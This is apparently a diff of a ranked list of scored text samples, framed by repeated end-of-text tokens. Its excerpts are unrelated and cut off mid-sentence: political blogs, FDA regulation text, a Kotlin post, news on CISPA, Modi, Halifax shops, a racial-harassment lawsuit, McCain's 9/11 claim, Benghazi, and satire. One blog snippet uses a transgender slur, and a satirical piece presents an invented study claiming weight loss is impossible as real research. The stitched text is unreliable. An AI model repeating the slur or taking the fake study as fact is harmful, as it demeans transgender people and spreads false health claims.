><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 35; Score = 5996544.0 +Rank = 34; Score = 3391488.0 <|begin_of_text|>Where transgenders decide to sprinkle their tinkle is NOBODY’S BUSINESS! Except it’s everyone’s business. Including that of white-knightly tech giants like Apple and Ebay. You may recall not long ago Trump reversed Obama’s decision which forced states to allow trannies into certain bathrooms. Our current President didn’t outlaw those transgender bathroom privileges, but simply restored the states’ power to discern for themselves. Therein lies the outrage. Apple and other companies have decided to take a stand… By getting involved in a lawsuit filed by a trans student suing his school for boys’ bathroom privileges. @@ -773,7 +752,10 @@ These companies really, really care about rights. Just not the rights of the sta Look, this is America, where businesses can say and do what they please. The problem here? These companies are alienating a large portion of their ================================================================================ -Rank = 36; Score = 5996544.0 +Rank = 35; Score = 3375104.0 +<|begin_of_text|>(a) The general principles and factors that the Food and Drug Administration (FDA) considered in arriving at the reference amounts customarily consumed per eating occasion (reference amounts) which are set forth in paragraph (b) of this section, are that: (1) FDA calculated the reference amounts for persons 4 years of age or older to reflect the amount of food customarily consumed per eating occasion by persons in this population group. These reference amounts are based on data set forth in appropriate national food consumption surveys. (2) FDA calculated the reference amounts for an infant or child under 4 years of age to reflect the amount of food customarily consumed per eating occasion by infants up to 12 months of age or by children 1 through 3 years of age, respectively. These reference amounts are based on data set forth in appropriate national food consumption surveys. Such reference amounts are to be used only when the food is specially formulated or processed for use by an infant or by a child under 4 years of age. (3) An appropriate national food consumption survey includes a large sample size representative of the demographic and socioeconomic characteristics of the relevant population group and must be based on consumption data under actual conditions of use. (4) To determine the amount of food customarily consumed per eating occasion, FDA considered the mean, median, and mode of the consumed amount per eating occasion. (5) When survey data were insufficient, FDA took various other sources of information on serving sizes of food into consideration. These other sources of information included: (i) Serving sizes used in dietary guidance recommendations or recommended by other authoritative systems or organizations; (ii) Serving sizes recommended in comments; (iii) Serving sizes used by manufacturers and grocers; and (iv) Serving sizes used by other countries. (6) Because they reflect the amount customarily consumed, the reference amount and, in turn, the serving size declared on the product label are based on only the edible portion of food, and not bone, seed, shell, or other inedible components. (7) The reference amount is based on the major intended use of the food (e.g., milk as a beverage and not as an addition to cereal). (8) The reference amounts for products that are consumed as an ingredient of other foods, but that may also be consumed in the form in which they are purchased (e.g., butter), are based on use in the form purchased. (9) FDA sought to ensure that foods that have similar dietary usage, product characteristics, and customarily consumed +================================================================================ +Rank = 36; Score = 3358720.0 <|begin_of_text|>Team Android at Basecamp recently passed a fairly big milestone — over 25% of the Basecamp 3 Android app code base now runs on Kotlin! 🎉 We’ve found that Kotlin not only makes our code much better, but massively increases programmer happiness. All of this ensures we’re making the best app we can for the tens of thousands of Android users we support. @@ -858,132 +840,101 @@ when (firstName) { "Jamie ================================================================================ -Rank = 37; Score = 5963776.0 -<|begin_of_text|>Seven former Illinois women’s basketball players are suing the university, claiming that head coach Matt Bollant and former assistant coach Mike Divilbiss violated Title VI by creating a racially hostile environment. +Rank = 37; Score = 3342336.0 +<|begin_of_text|>Worse than SOPA, CISPA will allow monitoring, censorship, alteration of ANY online communication -The players are suing for $10 million in compensatory and punitive damages as well as attorney’s fees. +The assaults keep coming like the Terminator, don't they? This one is bipartisan, too. Comes to you from Rep. Mike Rogers (R-MI) and Rep. C.A. �Dutch� Ruppersberger (D-MD). Strongly recommend reading the entire article. -The specific claims—filed by Amarah Coleman, Alexis Smith, Taylor Tuck, Nia Oden, Sarah Livingston, Taylor Gleason, and Jacqui Gran—against Bollant are broken down into 13 specific points in the lawsuit: +____________________________________________ -a. Instituted segregated practices singling out the black Plaintiffs,Alexis Smith, Nia Oden and Taylor Tuck, as “crabs” because one crab can climb out of a bucket, but more than one pull eachother down in and none can get out; b. Referred to the black Plaintiffs, Alexis Smith, Nia Oden andTaylor Tuck, as “toxic.” c. Referred to these segregated practices as “the dog pound,” indirectly labeling the black Plaintiffs, Alexis Smith, Nia Odenand Taylor Tuck, dogs; d. Appointed a white player captain without a team vote and even though the majority of players at the time were black; e. Relegated and/or threatened relegation of the white Plaintiffs, Taylor Gleason and/or Jacqui Grant, to the “dog pound” in retaliation for these Plaintiffs’ continued association with and support of the black Plaintiffs against the racially hostile environment created by the Defendants, and labeled the whitePlaintiff in the segregated practices as a “mascot;” f. Instituted segregated travel room assignments, prohibiting white players from rooming with black players, including among the white and black Plaintiffs; g. During team preparations for games against other school swhose teams were predominantly made of black players, singled out the black Plaintiffs and other black teammates to ask what the players on the other team were thinking or going to do,implying that blacks think differently than whites; h. During team preparations for games against other schools whose teams were predominantly made of white players, and in the context of subpar. (g), above, did not ask the black players what the other team’s white players were thinking or going to do; i. During team preparations for games, referred to opposing teams predominantly made of black players as undisciplined and unintelligent, and referred to opposing teams predominantly made of white players as disciplined and intelligent; j. -================================================================================ -Rank = 38; Score = 5865472.0 -<|begin_of_text|>News that MPs will get the chance to vote on the final Brexit deal has been welcomed by Labour who plan to use the opportunity to continue doing f**k all about Britain leaving the EU. - -Leader Jeremy Corbyn immediately responded warmly to the announcement +http://www.digitaltrends.com/web/watch-out-washington-cispa-replaces-sopa-as-internets-enemy-no-1/ -“This vote is a victory for democracy and for the people of this country,” he said. +Watch out, Washington: CISPA replaces SOPA as Internet�s Enemy No. 1 -“And rest assured we will use it to continue our long-standing policy of doing f**k all about Brexit.” +By Andrew Couts -Labour have been committed to doing f**k all about Britain leaving the EU since the referendum was announced by David Cameron, whoever he is, some eighteen months ago. +Digital Trends -Immediately after the referendum announcement, Jeremy Corbyn swung into action by doing f**k all. +....Unveiled to the House by Rep. Mike Rogers (R-MI) and Rep. C.A. �Dutch� Ruppersberger (D-MD) late last year, CISPA is described as a �cybersecurity� bill. It proposes to amend the National Security Act of 1947 to allow for greater sharing of �cyber threat intelligence� between the U.S. government and the private sector, or between private companies. The bill defines �cyber threat intelligence� as any information pertaining to vulnerabilities of, or threats to, networks or systems owned and operated by the U.S. government, or U.S. companies; or efforts to �degrade, disrupt, or destroy� such systems or networks; or the theft or �misappropriation� of any private or government information, including intellectual property. -When campaigning started in earnest Labour remained constant in doing f**k all. +.... -Not wishing to let the momentum drop, at the height of the campaign Shadow Chancellor John McDonnell did f**k all. +The Electronic Frontier Foundation (EFF) adds that CISPA�s definition of �cybersecurity� is so broad that �it leaves the door open to censor any speech that a company believes would �degrade the network.�� Moreover, the inclusion of �intellectual property� means that companies and the government would have �new powers to monitor and censor communications for copyright infringement.� -Finally, when the referendum result was announced, Jeremy Corbyn did his best to rally shellshocked remainers by doing f**k all. +Furthermore, critics warn that CISPA gives private companies the ability to collect and share information about their customers or users with immunity � meaning we cannot sue them for doing so, and they cannot be charged with any crimes. According to the EFF, CISPA �effectively creates a �cybersecurity� exemption to all existing laws.� -Every day since, Labour has remained proudly committed to doing f**k all about Brexit and, with this new announcement, look set to continue doing f**k all until the country is completely isolated and vilified, and is ultimately reduced to being little more than a nice place for Donald Trump to park his helicopter.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +�There are almost no restrictions on what can be collected and how it can be used, provided a company can claim it was motivated by �cybersecurity purposes,�� the EFF continues. �That means a company like Google, Facebook, Twitter, or AT&T could intercept your emails and text ================================================================================ -Rank = 39; Score = 5799936.0 -<|begin_of_text|>Canadian Tire moving Clayton Park store to former Target in Bayers Lake. Canadian Tire also opened their new store in Elmsdale this week. - -I’m slow on the draw, this timebut the Burrito Jax in Clayton Park is open, just on the side of Sobeys. - -East Coast Lifestyle to open a Halifax storefront, location TBD - -The Home Hardware in Enfield is closed after 60 years +Rank = 38; Score = 3325952.0 +<|begin_of_text|>Prime Minister Narendra Modi has ‘replaced’ Mahatma Gandhi in the 2017 wall calendar and table diary published by the Khadi Village Industries Commission (KVIC), official sources said on Thursday, as opposition leaders reacted sharply to the move. -In Costco Cafe news Smoked Meat Sandwiches going on Monday. Replacing with Chk Caesar Salad. Will sell meat till stock gone +The cover photo of the calendar and diary shows Modi weaving khadi on a large ‘charkha’, in the same classic pose as Gandhiji. In response, the employees of KVIC at its Vile Parle headquarters plan to stage “a silent, soul-cleansing” protest wearing black bands on their mouths, during lunch hour on Thursday. -Urban Outfitters is having their Grand Opening on May 15, paper is off the windows and stocking the shelves is in progress. +Political leaders took a jibe at the Prime Minister for replacing the iconic image of Gandhi, including Delhi chief minister Arvind Kejriwal, Congress vice-president Rahul Gandhi and former AAP member Yogendra Yadav, tweeting about it. -Tom’s Havana confirmed that they are indeed moving October 1, but new location not finalized yet. Sleep Country on Spring Garden is moving with BMO to the new building where Winsby’s used to be. +“Becoming Gandhi requires years of austerities. One cannot become Gandhi by acting to spin the Charkha, this would only ridicule them,” Kejriwal said in a tweet. -Zions Gate, in Spryfield has open a liquidation centre at the back of South Centre Mall (by Bowlarama) +Gandhiji would've welcomed it, also opposed his photo on notes. -Ottoman Cafe and Mid Point Coffee on Spring Garden are closing up shop and heading to Toronto. +We should welcome it too. Less hypocrisy.https://t.co/q1fVI2RYmA — Yogendra Yadav (@_YogendraYadav) January 12, 2017 -The Jessy’s Pizza in Kingswood is now open. +Rahul too called Modi’s move “the mangalyaan effect”, referring to India’s Mars Orbiter Mission. -The Holiday Inn Express, Kearney Lake is now Chateau Bedford<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 40; Score = 5570560.0 -<|begin_of_text|>WASHINGTON–John McCain is the latest high-profile politician to repeat the diehard American falsehood that the 9/11 terrorists entered the United States through Canada. Just days after Janet Napolitano, the U.S. homeland security secretary, sparked a diplomatic kerfuffle by suggesting the terrorists took a Canadian route to the U.S. eight years ago, McCain defended her by saying that, in fact, the former Arizona governor was correct. "Well, some of the 9/11 hijackers did come through Canada, as you know," McCain, last year's Republican presidential candidate, said on Fox News on Friday. The Arizona senator's remarks prompted the Canadian embassy to immediately reissue remarks made earlier this week by Ambassador Michael Wilson, who reminded Americans once again that no 9/11 perpetrators came to the U.S. via Canada. "Unfortunately, misconceptions arise on something as fundamental as where the 9/11 terrorists came from," Wilson said. +The Mangalyaan effecthttps://t.co/NnkbJ4i7vx — Office of RG (@OfficeOfRG) January 13, 2017 -Article Continued Below +While Gandhi’s historic picture weaving khadi on a simple charkha, wearing his trademark loin cloth, is legendary and imprinted in the minds of the masses since generations, Modi comes across in his signature attire of kurta-pyjama-waistcoat, weaving khadi on a slightly modern charkha. -"As the 9/11 Commission reported in July 2004, all of the 9/11 terrorists arrived in the U.S. from outside North America. They flew to major U.S. airports. They entered the U.S. with documents issued to them by the U.S. government. No 9/11 terrorists came from Canada." Crestfallen embassy officials contacted McCain's office soon after his Fox News remarks to set the record straight. McCain, an avid supporter of NAFTA and a powerful friend to Canada on Capitol Hill, recently visited the Canadian Embassy and had lunch with Wilson. The normally reserved Wilson made his 9/11 remarks on Tuesday following a CBC interview in which Napolitano appeared to believe that the hijackers entered the U.S. from Canada. +KVIC chairman Vinai Kumar Saxena said this was “not unusual” and there have been deviations in the past. -She later said she had misunderstood a question asked during the interview and was well aware there had been no Canadian 9/11 connection, but added that the Canada-U.S. border had, in the past, posed a security risk to Americans. The next day, Napolitano appeared at a border conference and suggested Canada was more lax in its immigration policies than the U.S., alleging Canadian authorities allow people into the country that would not pass muster south of the border. Napolitano has also ruffled diplomatic feathers with her insistence that the Canadian border must not be treated any differently than the U.S.-Mexican boundary, where a drug war rages and countless illegal immigrants flood into America every year. McCain expressed some sympathy for Canada on that front on Friday. +“The entire khadi industry (udyog) is based on Gandhiji’s philosophy, ideas and ideals, he is the soul of KVIC, so there is no question of ignoring him,” Saxena told IANS. -Article Continued +KVIC calendar & dairy without Gandhiji's pics have been issued earlier too.Spirit is more important than the image.@PMOIndia,@ashokepandit. pic.twitter.com/57ksjFD1LQ — Chairman KVIC (@ ================================================================================ -Rank = 41; Score = 5570560.0 -<|begin_of_text|>WASHINGTON—According to a groundbreaking new study published Monday in the Journal Of The American Medical Association, it is impossible to lose weight, no one has ever lost a single pound of fat through diet or exercise, and those attempting to do so are advised to abandon their weight loss goals immediately. - -The study, conducted by scientists at The National Weight Control Registry, determined conclusively that shedding excess weight has never occurred, changing your appearance is impossible, and that it actually feels “pretty nice” to just give up and realize that you’re powerless to alter your body mass index in any way, shape, or form. - -Advertisement - -“Our findings indicate that if you’re trying to lose weight, you will fail—and that’s because you can’t, no one has, and you need to stop trying because it will never happen,” said Dr. Rena Wing, lead author of the report. “You could work out every day and eat nothing, and you still wouldn’t lose an ounce. And the sooner you throw up your hands and make peace with that fact, the better off you’ll be.” +Rank = 39; Score = 3309568.0 +<|begin_of_text|>Canadian Tire moving Clayton Park store to former Target in Bayers Lake. Canadian Tire also opened their new store in Elmsdale this week. -“Our data demonstrates that you’re doomed to look the way you look,” Wing added. “You are stuck in your body and it’s never going to look any better than it does right now. In fact, it will only get worse.” +I’m slow on the draw, this timebut the Burrito Jax in Clayton Park is open, just on the side of Sobeys. -According to the study, running on a treadmill every morning at 6 a.m. will not help anyone lose weight, and neither will cutting carbohydrates from one’s diet, eating smaller portions throughout the day, doing yoga, or hiring a personal trainer. In addition, the study went on to state that everyone who tried the previous methods have only ended up feeling disappointed and in some cases heartbroken, especially after individuals step onto a scale and realize that, after two weeks of healthy eating and nonstop exercise, they’ve actually gained two or more pounds. +East Coast Lifestyle to open a Halifax storefront, location TBD -Advertisement +The Home Hardware in Enfield is closed after 60 years -The report added that skinny people stay skinny, overweight people remain overweight, that’s how it has always been, that’s how it will always be, and every study, book, or news article you’ve ever read that has told you otherwise has been totally and completely wrong. +In Costco Cafe news Smoked Meat Sandwiches going on Monday. Replacing with Chk Caesar Salad. Will sell meat till stock gone -“Going to the gym is a waste of time if you are doing it to lose weight,” said University of California physiologist Dr. Andrew Novak, adding that time working out would be better spent reading, spending time with your family, sleeping, watching television, or eating. “Now, if you are exercising to prevent heart disease or cancer, well, new evidence has come to light that -================================================================================ -Rank = 42; Score = 5537792.0 -<|begin_of_text|>The combat code of the US Military is that we don’t abandon our dead or wounded on the battlefield. In US Air Force lingo, fighter pilots don’t run off and leave their wingmen. If one of our own is shot down, still alive and not yet in enemy captivity, we will either come to get him or die trying. Among America’s fighting forces, the calm, sure knowledge that such an irrevocable bond exists is priceless. Along with individual faith and personal grit, it is a sacred trust that has often sustained hope in the face of terribly long odds. +Urban Outfitters is having their Grand Opening on May 15, paper is off the windows and stocking the shelves is in progress. -The disgraceful abandonment of our Ambassador and those brave ex-SEALs who fought to their deaths to save others in that compound is nothing short of dereliction-of-duty. Additionally, the patently absurd cover-up scenario that was fabricated in the aftermath was an outright lie in attempt to shield the President and the Secretary of State from responsibility. +Tom’s Havana confirmed that they are indeed moving October 1, but new location not finalized yet. Sleep Country on Spring Garden is moving with BMO to the new building where Winsby’s used to be. -It has been over eight months since the attack on our compound in Benghazi. The White House strategy, with the aid of a “lap dog press” has been to run out the clock before the truth is forthcoming. The recent testimonies of the three “whistle blowers” have reopened the subject and hopefully will lead to exposure and disgrace of those responsible for this embarrassing debacle. +Zions Gate, in Spryfield has open a liquidation centre at the back of South Centre Mall (by Bowlarama) -It would appear that the most recent firewall which the Administration is counting on is the contention that there were simply no military assets that could be brought to bear in time to make a difference… mainly due to the unavailability of tanker support for fighter aircraft. This is simply BS, regardless how many supposed “experts” the Administration trot out to make such an assertion. The bottom line is that even if the closest asset capable of response was half-way around the world, you don’t just sit on your penguin *** and do nothing. The fact is that the closest asset was not half-way around the world, but as near as Aviano Air Base, Italy where two squadrons of F-16Cs are based. +Ottoman Cafe and Mid Point Coffee on Spring Garden are closing up shop and heading to Toronto. -Consider the following scenario (all times Benghazi local): +The Jessy’s Pizza in Kingswood is now open. -When Hicks in Tripoli receives a call at 9:40 PM from Ambassador Stevens informing him “Greg, we are under attack!” (his last words), he immediately notifies all agencies and prepares for the immediate initiation of an existing “Emergency Response Plan.” At AFRICON, General Carter Ham attempts to mount a rescue effort, but is told to “stand down.” By 10:30 PM an unarmed drone is overhead the compound and streaming live feed to various Command +The Holiday Inn Express, Kearney Lake is now Chateau Bedford<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|